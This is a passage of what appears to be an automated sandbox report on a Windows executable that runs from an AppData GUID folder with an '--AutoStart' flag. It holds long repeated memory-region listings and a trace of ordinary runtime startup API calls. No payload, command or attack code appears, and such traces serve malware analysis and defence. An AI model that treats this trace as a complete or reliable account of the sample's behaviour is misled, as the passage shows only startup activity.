"private_0x0000000002620000" filename = "" Region: id = 2751 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2752 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2753 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2754 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2755 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2756 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2757 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2758 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2759 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2760 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2761 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2762 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2763 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2764 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2765 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2766 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2767 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2768 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2769 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2770 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2771 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2772 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2773 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2774 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2775 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2776 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2777 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2778 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2779 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2780 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2781 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2782 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2783 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2784 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2785 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2786 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2787 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2788 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2789 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2790 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2791 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2792 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2793 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2794 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2795 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2796 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2797 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2798 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2799 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2800 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2801 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2802 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2803 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2804 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2805 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2806 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2807 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2808 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2809 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2810 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2811 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2812 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2813 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2814 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2815 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2816 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2817 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2818 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2819 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2820 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2821 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2822 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2823 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2824 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2825 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2826 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2827 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2828 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2829 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2830 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2831 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2832 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2833 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2834 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2835 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2836 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2837 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2838 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2839 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2840 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2841 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2842 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2843 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2844 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2845 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2846 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2847 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2848 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2849 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2850 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2851 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2852 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2853 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2854 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2855 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2856 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2857 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2858 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2859 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2860 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2861 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2862 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2863 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2864 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2865 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2866 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2867 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2868 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2869 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2870 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2871 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2872 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2873 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2874 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2875 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2876 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2877 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2878 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2879 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2880 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2881 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2882 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2883 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2884 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2885 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2886 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2887 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2888 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2889 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2890 start_va = 0x30a0000 end_va = 0x315ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2891 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2892 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2893 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2894 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2895 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Thread: id = 107 os_tid = 0x7dc [0173.121] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xe1e31880, dwHighDateTime=0x1d8a8d3)) [0173.121] GetCurrentThreadId () returned 0x7dc [0173.121] GetCurrentProcessId () returned 0x7d8 [0173.121] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=2065941455229) returned 1 [0173.144] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x76fbfd35, hStdError=0x77027daf)) [0173.177] GetProcessHeap () returned 0x2c0000 [0173.221] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76600000 [0173.221] GetProcAddress (hModule=0x76600000, lpProcName="FlsAlloc") returned 0x76614ee3 [0173.222] GetProcAddress (hModule=0x76600000, lpProcName="FlsFree") returned 0x7661354f [0173.222] GetProcAddress (hModule=0x76600000, lpProcName="FlsGetValue") returned 0x76611252 [0173.223] GetProcAddress (hModule=0x76600000, lpProcName="FlsSetValue") returned 0x766141c0 [0173.223] GetProcAddress (hModule=0x76600000, lpProcName="InitializeCriticalSectionEx") returned 0x76614ce0 [0173.223] GetProcAddress (hModule=0x76600000, lpProcName="CreateEventExW") returned 0x766946ab [0173.223] GetProcAddress (hModule=0x76600000, lpProcName="CreateSemaphoreExW") returned 0x76694735 [0173.223] GetProcAddress (hModule=0x76600000, lpProcName="SetThreadStackGuarantee") returned 0x7661d2d7 [0173.223] GetProcAddress (hModule=0x76600000, lpProcName="CreateThreadpoolTimer") returned 0x7662ee4e [0173.223] GetProcAddress (hModule=0x76600000, lpProcName="SetThreadpoolTimer") returned 0x76fe441c [0173.223] GetProcAddress (hModule=0x76600000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7700c50e [0173.223] GetProcAddress (hModule=0x76600000, lpProcName="CloseThreadpoolTimer") returned 0x7700c381 [0173.223] GetProcAddress (hModule=0x76600000, lpProcName="CreateThreadpoolWait") returned 0x7662f058 [0173.223] GetProcAddress (hModule=0x76600000, lpProcName="SetThreadpoolWait") returned 0x76ff05d7 [0173.224] GetProcAddress (hModule=0x76600000, lpProcName="CloseThreadpoolWait") returned 0x7700ca24 [0173.224] GetProcAddress (hModule=0x76600000, lpProcName="FlushProcessWriteBuffers") returned 0x76fc0b8c [0173.224] GetProcAddress (hModule=0x76600000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7707fde8 [0173.224] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentProcessorNumber") returned 0x77011e1d [0173.224] GetProcAddress (hModule=0x76600000, lpProcName="GetLogicalProcessorInformation") returned 0x76694d01 [0173.224] GetProcAddress (hModule=0x76600000, lpProcName="CreateSymbolicLinkW") returned 0x7668d181 [0173.224] GetProcAddress (hModule=0x76600000, lpProcName="SetDefaultDllDirectories") returned 0x74f6208a [0173.224] GetProcAddress (hModule=0x76600000, lpProcName="EnumSystemLocalesEx") returned 0x766947ef [0173.224] GetProcAddress (hModule=0x76600000, lpProcName="CompareStringEx") returned 0x76694c51 [0173.224] GetProcAddress (hModule=0x76600000, lpProcName="GetDateFormatEx") returned 0x766a6c26 [0173.224] GetProcAddress (hModule=0x76600000, lpProcName="GetLocaleInfoEx") returned 0x76694cf1 [0173.225] GetProcAddress (hModule=0x76600000, lpProcName="GetTimeFormatEx") returned 0x766a6ba1 [0173.225] GetProcAddress (hModule=0x76600000, lpProcName="GetUserDefaultLocaleName") returned 0x76694d61 [0173.225] GetProcAddress (hModule=0x76600000, lpProcName="IsValidLocaleName") returned 0x76694d81 [0173.225] GetProcAddress (hModule=0x76600000, lpProcName="LCMapStringEx") returned 0x76694d91 [0173.225] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentPackageId") returned 0x0 [0173.225] GetProcAddress (hModule=0x76600000, lpProcName="GetTickCount64") returned 0x7662eeb0 [0173.225] GetProcAddress (hModule=0x76600000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0173.225] GetProcAddress (hModule=0x76600000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0173.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3bc) returned 0x2df4a8 [0173.226] GetCurrentThreadId () returned 0x7dc [0173.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2d1e90 [0173.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x800) returned 0x2df870 [0173.238] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xe6ac6837, hStdError=0x0)) [0173.238] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0173.238] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0173.238] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0173.238] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart" [0173.238] GetEnvironmentStringsW () returned 0x2e0078* [0173.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb46) returned 0x2e0bc8 [0173.249] FreeEnvironmentStringsW (penv=0x2e0078) returned 1 [0173.261] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0x8a [0173.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x13a) returned 0x2e1718 [0173.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x9c) returned 0x2e1860 [0173.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3e) returned 0x2d24b0 [0173.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x56) returned 0x2e1908 [0173.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x6e) returned 0x2e1968 [0173.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x78) returned 0x2cfd50 [0173.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x62) returned 0x2e19e0 [0173.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x30) returned 0x2db568 [0173.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d7080 [0173.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x28) returned 0x2daf60 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1a) returned 0x2ded60 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x34) returned 0x2d1eb0 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x5c) returned 0x2e1a50 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x32) returned 0x2e1ab8 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2e) returned 0x2db5a0 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1c) returned 0x2ded88 [0173.262] 